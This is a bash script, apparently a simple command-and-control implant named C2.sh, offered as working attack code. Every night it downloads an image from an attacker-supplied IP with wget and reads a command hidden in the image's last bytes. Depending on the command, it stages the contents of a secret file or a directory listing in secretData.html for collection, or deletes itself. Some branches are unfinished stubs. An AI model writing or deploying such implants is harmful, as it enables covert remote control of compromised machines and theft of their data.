#!/bin/bash

"""
This is the script that is downloaded + run every night
W/out cron version
"""
ip_addr=$1
image_name="mainImage.png"
while true
do
    current=$(date +%s)
    #Pull image down from site
    wget -nd -r $image_name -A jpeg,jpg,bmp,gif,png http://$ip_addr:8000/$image_name
    #check if there is an image, if not assume connection is broken and delete self
    if [[ 100 < 1 ]]; then
        echo "image hasn't been uploaded"

        #remove scripts
        rm C2.sh

        echo "delete" 
        exit
    fi

    #Load downloaded image
    load_image=$(<$image_name)

    #Take the command
    cmnd="$(echo $load_image | tail -c 5)"
    #delete image after taking command
    rm $image_name 

    echo $cmnd
    #Follow according to that command
    if [ $cmnd = "0000" ]; then #post data
        echo "post"
        #Need to know where vulnerable data is
        secret_file="secret_file.txt"

        #post secret data to website
        touch "secretData.html"
        cat $secret_file > "secretData.html"

        #sleep for 1 hour
        sleep 3600
        rm secretData.html
    #elif: change ip address
    #elif: sendback directories
    elif [ $cmnd = "1111" ]; then #Delete self
        #delete all mentions in crontainer
        #remove scripts
        rm C2.sh

        echo "delete" 
    elif [ $cmnd = "1101" ]; then #change file path
        echo "change path"
    elif [ $cmnd = "1011" ]; then #send back directory
        dir=$(ls *)
        
        echo $dir > "secretData.html"
        sleep 3600
        rm secretData.html
    fi


    #Sleep until next night
    current=$(date +%s)
    echo "current: $current"
    target=$(date -d 'tomorrow 1:30' +%s)
    sleep_seconds=$(( $target - $current ))
    echo "sleep $sleep_seconds"

    #Testing for now sleep 5 minutes
    sleep 300

done
